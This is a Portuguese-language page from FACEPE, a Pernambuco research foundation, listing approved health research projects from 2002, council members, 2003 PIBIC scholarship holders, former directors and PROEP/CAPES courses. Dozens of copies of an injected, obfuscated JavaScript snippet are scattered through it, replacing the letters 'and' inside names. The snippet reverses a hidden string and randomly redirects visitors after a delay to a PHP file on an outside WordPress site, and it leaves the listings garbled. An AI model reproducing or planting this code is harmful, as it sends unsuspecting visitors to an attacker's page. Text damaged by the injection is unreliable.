02/2002 – Programa de Ciência e Tecnologia em Saúde – PCT-Saúde

  • - Nº 02/2002 de 30/05/2002
EDITAL PCT-SAÚDE – Nº 02/2002 de 30/05/2002
Relação dos projetos aprovados
N.
COORDENADOR PROJETO  INSTITUIÇÃO
1.
Alcides da Silva Diniz
PERFIL EPIDEMIOLÓGICO COMO INSTRUMENTO PARA ESTRATÉGIAS DE INTERVENÇÃO NA ATENÇÃO À SAÚDE DO IDOSO NO MUNICÍPIO DE CAMARAGIBE – PERNAMBUCO – BRASIL
UFPE/Secretaria Municipal de Saúde
2.
Constança Clara G. Simões
DIAGNÓSTICO EPIDEMIOLÓGICO E CONTROLE DA ESQUISTOSSOMOSE EM FOCOS LITORÂNEOS DE PERNAMBUCO
FIOCRUZ / CPqAM
3.
Divaldo de Almeida Sampaio
ESTUDO DA VIABILIDADE DA PRÉ-TESTAGEM PARA SÍFILIS EM CANDIDATOS À DOAÇÃO DE SANGUE DE PRIMEIRA VEZ
HEMOPE
4.
Eduardo Maia Freese
ANÁLISE DO PERFIL DAS DOENÇAS CRÔNICAS NÃO TRANSMISSÍVEIS EM MESORREGIÕES E MUNICÍPIOS DE PERNAMBUCO: SUBSÍDIOS PARA UMA PROPOSTA DE VIGILÂNCIA EPIDEMIOLÓGICA
FIOCRUZ / CPqAM
5.
Emanoel Sérvio C. dos Santos
DESENVOLVIMENTO DE APLICATIVO EM SISTEMAS DE GEOINFORMAÇÃO – SIG VISANDO O MONITORAMENTO EPIDEMIOLÓGICO DO CALAZAR
UFPE
6.
Eronildo Felisberto
MONITORAMENTO DAS AÇÕES PROGRAMÁTICAS NA ATENÇÃO BÁSICA DE SAÚDE
IMIP
7.
Garibaldi Dantas G. Júnior
COMPLEXO REGULADOR DA ASSISTÊNCIA A SAÚDE: UM INSTRUMENTO DE GESTÃO A SERVIÇO DA CIDADANIA
FIOCRUZ / CPqAM
8.
Haiana Charefker Schindler
DESENVOLVIMENTO E VALIDAÇÃO DE ABORDAGENS MOLECULARES E IMUNOLÓGICAS PARA O DIAGNÓSTICO DA TUBERCULOSE INFANTIL
FIOCRUZ / CPqAM
9.
Ilma Kruze Gr$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ande
OBESIDADE INFANTIL: DIAGNÓSTICO, TRATAMENTO E AVALIAÇÃO EM ESCOLARES DA REDE PÚBLICA E PRIVADA DOS MUNICIPIOS DE CAMARAGIBE E JABOATÃO DOS GUARARAPES
UFPE/Secretarias Municipais de Saúde
10.
Maria Cristina H. Sampaio
INFECÇÃO HOSPITALAR DO HEMOPE: UM ESTUDO AVALIATIVO DAS AÇÕES DE PREVENÇÃO
UFPE/HEMOPE
11.
Marluce Tavares de Oliveira
VIOLÊNCIA DOMÉSTICA CONTRA ADOLESCENTES: UM ESTUDO DE DEMANDA AMBULATORIAL
UPE/CISAM
12.
Paulo H. Martins
REDE DE VIGILÂNCIA, CIDADANIA E PROBLEMAS ENDÉMICOS
UFPE/CPqAM
13.
Raul Antonio Moraes Filho
PERFIL DO DOADOR NÃO-APARENTADO DE MEDULA ÓSSEA DO ESTADO DE PERNAMBUCO
HEMOPE/UPE
14.
Sinval Pinto B. Filho
EPIDEMIOLOGIA DAS LEISHMANIOSES NA ZONA DA MATA NORTE DE PERNAMBUCO: INCRIMINAÇÃO DE HOSPEDEIROS RESERVATÓRIOS, VETORES E CARACTERIZAÇÃO DO PADRÃO DE TRANSMISSÃO
FIOCRUZ / CPqAM
O resultado das demais propostas não aprovadas está liberado para os coordenadores, mediante informação da senha no CNCT e CPF dos mesmos, no seguinte endereço: http://reaact.cesar.org.br/proponentes

andidaturas a Membro do Conselho Superior da FACEPE

PRESIDENTE DO CONSELHO
Cláudio Marinho
Secretário de Ciência, Tecnologia e Meio Ambiente do Estado de Pernambuco
[Ver currículo Lattes]

CONSELHEIROS

Divaldo de Almeida Sampaio
Designado pelo Governador do Estado
M$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andato: 22/07/2002 a 21/07/2008
[Ver currículo Lattes]

José Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Thomé Jucá
Designado pelo Governador do Estado
M$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andato: 01/12/1998 a 01/12/2004
[Ver currículo Lattes]

Francisco Cribari Neto
Eleito representante da área de Ciências Exatas e da Computação
M$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andato: 31/05/2004 a 30/05/2007
[Ver currículo Lattes]

José Geraldo Eugênio de França
Designado pelo Governador do Estado
M$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andato: 29/12/1998 a 29/12/2004
[Ver currículo Lattes]

Leila Maria Moreira Beltrão
Designado pelo Governador do Estado
M$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andato: 22/07/2002 a 21/07/2008
[Ver currículo Lattes]

Galba Maria Campos-Takaki
Eleita representante da área de Ciências Biológicas e Saúde
M$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andato: 01/03/2001 a 28/02/2007
[Ver currículo Lattes]

Yoni de Sá Barreto Sampaio
Eleita representante da área de Ciências Humanas e Sociais
M$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andato: 01/03/2001 a 28/02/2007
[Ver currículo Lattes]
–>
Rosa de Lima Ramos Mariano
Eleita representante da área de Ciências Agrárias
M$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andato: 30/12/1998 a 29/12/2004
[Ver currículo Lattes]

01/2003 – Bolsistas PIBIC/FACEPE/CNPQ 2003

Bolsistas PIBIC/FACEPE/CNPQ – 2003

Relação dos bolsistas aprovados e classificados para o Programa Institucional de Iniciação Científica – PIBIC 2003

1. Adelane Maria Rocha Leite
2. Adriana de Carvalho Figueiredo
3. Alex$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andre Franca Barreto
4. Alex$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andro Pereira da Silva
5. Alexs$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andro José de Melo Farias
6. Aline Clemente de Andrade
7. Almir Carlos Ferreira
8. Amélia Tavares Pessoa
9. Ana Heloísa de Melo
10. Ana Paula de Almeida Silva
11. Ana Roberta Pessoa Aguilar Canas
12. Ana Valéria Gouveia de Andrade
13. Angélica Andrade Vicente
14. Anissa Daliry
15. Augusto Cesar Barreto Neto
16. Basílio Soares Barbosa Maciel
17. Beatriz Regina Brito de Oliveira
18. Bernardo Kemper
19. Bruna de Oliveira
20. Bruno Esteves Tavora
21. Bruno Reinaldo de Carvalho
22. Camila Lemos Antunes
23. Catarina Tavares de Melo
24. Cleidio da Paz Cabral
25. Cynthia Ferreira de Lira
26. Cynthia Nunes de Oliveira Brito
27. Cyra Luciana Ribeiro de Oliveira
28. Daniela de Araújo Viana
29. Daniela Medeiros Maranhão
30. Danielle Costa Cavalcanti
31. Danielli Barreto Maciel
32. Danilo Mamede da Silva Santos
33. Divaldo de Arruda Camara Júnior
34. Duschinka Ribeiro Duarte Guedes
35. Elaine Cristina Ferraz Correia
36. Eleonora de Figueiredo Moraes
37. Elida Carina Barbosa da Silva
38. Elisama Carvalho da Costa
39. Eliza Raquel Negrão Grangeiro
40. Ermes Ferreira Costa Neto
41. Ethiene Castellucci Estevam
42. Fabiana Aparecida da Silva Araújo
43. Fabiana Maria da Silva
44. Fabiana Queiroga Cavalcanti de Paula
45. Fábio de Lima Hedayioglu
46. Felipe Cezar de Carvalho Lima
47. Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda Mafra Caju
48. Flávio Manoel Rodrigues da Silva Júnior
49. Gabrielle Sousa e Silva
50. Geise Danielle de Sousa Sales
51. George Vinícius Ferreira da Silva
52. Graziella de Sá Gattai
53. Gustavo Lira de Melo
54. Gutemberg Azevedo da Silva Sampaio
55. Iberê J$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andir Alves Matias
56. Ícaro Gomes Antonio
57. Isaac Batista de Araújo
58. Ítalo Cesar de Souza Belo
59. Iury Hudson Correia de Lacerda
60. Jamenson Farias Batista
61. James Correia de Melo
62. Janaína de Oliveira Siqueira
63. Jane Kelly Silva Araújo
64. João Augusto dos Santos Filho
65. João Orl$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Correia de Deus
66. Juliana Félix de Melo
67. Júlio Cesar Saldanha Tavares
68. Júlio José do Nascimento Silca
69. Kaasy Mary Cavalcanti
70. Karinna Melo Alvino de Lima
71. Karla Cristine Alves Pereira
72. Katianne Cristina da Silva Veríssimo
73. Kelaine de Mir$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda Demetrio
74. Kelvina Araújo de Souza
75. Késsia Giovanna Carvalho Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andes
76. Leonardo Tavares do Nascimento
77. Leonela Walnei Duarte Costa
78. Letícia Souto Ribeiro de Franca
79. Lícia Cotrim Carneiro Leão
80. Lidiane Lindinalva Barbosa Amorim
81. Liliane Roberta de Melo Filho
82. Luciana de Sá Ribeiro
83. Luiza Feitosa Cordeiro de Souza
84. Maíra Monteiro Roazzi
85. Manoela Alves Pereira
86. Manoella Dantas Costa Mendes
87. Manuela Queiroz Oliveira
88. Marcela Maria Pereira de Lemos Pinto
89. Marcela Sobral Cabral Magalhaes
90. Marcelo Alves Ramos
91. Marcelo Ataíde de Lima
92. Marcelo Henrique Santos Paiva
93. Marcos Henrique Moura dos Santos
94. Maria Audenise Bonifácio de Lima
95. Maria Cláudia Aires de Campos
96. Maria de Lemos Sobral
97. Maria Eduarda Abath Valença
98. Maria Eduarda Abrantes Torres
99. Maria Goretti Soares
100. Maria Juliana Rodrigues Mateus
101. Maria Luiza Alves Dornelas Camara
102. Mariana Azevedo de Andrade Ferreira
103. Marina de Moraes Vasconcelos Petribu
104. Mariany Souza de Brito
105. Marieta Carvalho Torres Galindo
106. Marília Ferreira Maciel
107. Marília Gabriela dos Santos Cavalcanti
108. Marina de Lemos Sobral
109. Mayna Nogueira Souza
110. Mirtes Gonçalves Barbosa da Silva
111. Murielle Andreo Olivo
112. Nájara Ferreira Tavares
113. Nívia Cruz Quental
114. Patrícia Br$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andão da Silveira
115. Patrícia Cristina Monteiro de Barros
116. Patrícia Marinho Araújo
117. Paula Brasileiro de Araújo Fellows
118. Paula Frassinetti Pereira Carneiro
119. Paula G.L. Pinheiro
120. Paulo Alex$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andre Nunes Neto
121. Paulo Vinicios Valeriano Leite
122. Pedro Giovanni Almeida Ramos de Oliveira
123. Pedro Henrique Luna de Farias
124. Pedro Os$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andy Alves Matos Júnior
125. Penelope Matos Wirtzibiki
126. Rachel Nunes de Oliveira Brito
127. Rafael Luiz da Silva
128. Rafaela Maria de Lima Medeiros
129. Ramilton Jader Menezes Santos
130. Renata Angeli
131. Renata Borges da Silva Santos
132. Renata Carvalho de Mir$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anda e Sousa
133. Renata Gonçalves de Vasconcelos
134. Renata Gonçalves dos Santos Inácio
135. Rita de Cássia Carvalho Coutinho Rosa
136. Rivaldo Frias dos Santos Júnior
137. Rivelyno da Costa Lins
138. Roberta de Castro Chaves Cabral
139. Roberto de Albuquerque Melo
140. Rodrigo Bezerra Fonseca
141. Rodrigo Callou da Silva Santos
142. Rodrigo Politi Provazzi
143. Romilton Aureliano da Rocha Neto
144. Rosemberg de Vasconcelos Bezerra
145. Sayuri Matsumiya Alves Arruda
146. Sérgio Romero Oliveira de Souza
147. Sílvio Felipe Barbosa de Lima
148. Sílvio Henrique Lino Dias
149. Stélio Bezerra Pinheiro de Lima
150. Suellen Soraia Nunes Azevedo
151. Taciana Antonia dos Santos
152. Taisy Cinthia Ferro Cavalcante
153. Tereza Rebecca de Melo e Lima
154. Thiago Gama de Lima Neto
155. Thiers Araújo Campos
156. Tiago Cavalcante Araújo
157. Vivian Vieira de Medeiros
158. Wagner Luis Mendes Oliveira
159. Waléria Elias de Araújo
160. Zelia Dalla Nora Macedo

andidaturas ao Cargo de Diretor Científico e Tecnológico da FACEPE

PRESIDENTES

1990Sebastião Simões Filho
Graduado em Química Industrial – Escola de Química do Recife

1991Roberto Oliveira de Aguiar
PhD pela London School of Economics $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}and Political Science.

1995Lúcia Carvalho Pinto de Melo
Mestre em Energia e Meio Ambiente – Universidade da Califórnia, Santa Bárbara, UCSB, Estados Unidos. Mestre em Física – Universidade Federal de Pernambuco – UFPE, Recife, PE.

1999José Carlos Silva Cavalcanti
Doutor em História Econômica – Universidade de Manchester – Reino Unido.

2003José Carlos Vieira W$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}anderley
PhD. em Educação Comparada e Internacional. University of California at Los Angeles, UCLA, Estados Unidos.
DIRETORES DE CIÊNCIA E TECNOLOGIA

1990Sérgio Machado Resende
PhD em Engenharia Elétrica, no Massachusetts Institute of Technology (MIT).

1993Eduardo Henrique de Magalhães Melo
PhD em Química – University of Birmingham, Reino Unido.

1996André Freire Furtado
Doutor em Biologie de la Reproduction – Faculté des Sciences – Sorbonne, SORBONNE, França.

1999Ivon Palmeira Fittipaldi
Doutor em Ciências – Instituto de Física da Universidade de São Paulo, São Paulo – SP.

2003Fern$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando Luis de Araujo Machado
PhD em Física – University of California at Los Angeles, UCLA, Estados Unidos.

03/2003 – Programa PROEP CAPES

Projetos Aprovados
Condicionados a Homologação da CAPES – Nº 03/2003 de 05/05/2003

SOLICITANTE
NOME DO PROJETO/LOCAL DE REALIZAÇÃO DO CURSO
ÁREAS DO CURSO
FOCO ESPECÍFICO
EDVALDO MESQUITA BELTRÃO FILHO
CEFET – RECIFE

CURSO DE CAPACITAÇÃO EM TECNOLOGIAS EMPREGADAS NA PRODUÇÃO DE UVA E ELABORAÇÃO DE VINHOS
PETROLINA/PE

 
AGROPECUÁRIA
VITIVINICULURA

EMANUEL FERREIRA LEITE
FIR

CURSO POLÍTICA E GESTÃO DA INOVAÇÃO TECNOLÓGICA E INFORMAÇÃO PARA NEGÓCIOS
RECIFE/PE
GESTÃO
INOVAÇÃO E DIFUSÃO TECNOLÓGICA
FERNANDO JOSÉ FREIRE
UFRPE

GESTÃO AMBIENTAL E OTIMIZAÇÃO DA EXPLORAÇÃO E UTILIZAÇÃO DO GESSO NA REGIÃO DO ARARIPE-PE
RECIFE/PE
INDÚSTRIA
PÓLO GESSEIRO
FRANCISCO FERNANDO RAMOS DE CARVALHO
UFRPE
CURSO DE ATUALIZAÇÃO TÉCNICO-PROFISSIONAL NA ATIVIDADE DA CAPRINO-OVINICULTURA.
SERRA TALHADA/PE

 

AGROPECUÁRIA
CAPRINO – OVINICULTURA
LUCIANO MANFROI
CEFET – PETROLINA
CURSO DE CAPACITAÇÃO EM OBTENÇÃO DE DERIVADOS NOBRES DO LEITE DE CABRA
PETROLINA/PE
AGROPECUÁRIA
CAPRINO – OVINICULTURA
LUCILA ÉSTER PRADO BORGES
UFPE
CURSO DE CAPACITAÇÃO EM GESTÃO AMBIENTAL NA REGIÃO DO ARARIPE PARA PROFESSORES, TÉCNICOS E GESTORES ENVOLVIDOS NA CADEIA PRODUTIVA DO GESSO.
ARARIPINA/PE
INDÚSTRIA
PÓLO GESSEIRO
MARCOS MORAES VALENÇA
CEFET – RECIFE
CURSO DE QUALIFICAÇÃO TECNOLÓGICA EM INOVAÇÃO E DIFUSÃO
RECIFE/PE

GESTÃO
INOVAÇÃO E DIFUSÃO TECNOLÓGICA
MARIA ALICE VASCONCELOS ROCHA
UFRPE
PLURAL – CAPACITAÇÃO PARA A INDÚSTRIA DO VESTUÁRIO
CARUARU/PE
INDÚSTRIA
CONFECÇÕES
MARIA CRISTINA DE OLIVEIRA CARDOSO COELHO
UFRPE

“CURSO DE FLEXIBILIZAÇÃO DO ENSINO DA SANIDADE CAPRINA E OVINA ATRAVÉS DE MÉTODOS DE APRENDIZAGEM TEÓRICO-PRÁTICO”
SERRA TALHADA/PE

AGROPECUÁRIA
CAPRINO – OVINICULTURA
MOHAND BENACHOUR
UFPE
CAPACITAÇÃO DE INSTRUTORES EM TECNOLOGIA DE PRODUÇÃO DE GESSO E SEUS DERIVADOS
RECIFE/PE
INDÚSTRIA
PÓLO GESSEIRO
PAULO CARNEIRO DA CUNHA FILHO
UFPE
TECNOLOGIAS DE EDUCAÇÃO À DISTÂNCIA APLICADAS À EDUCAÇÃO PROFIOSSIONAL
RECIFE/PE
INFORMÁTICA
INFORMÁTICA APLICADA À EDUCAÇÃO PROFIOSSIONAL E GESTÃO TECNOLÓGICA
VALDEMIR ALEXANDRE DOS SANTOS
UNICAP
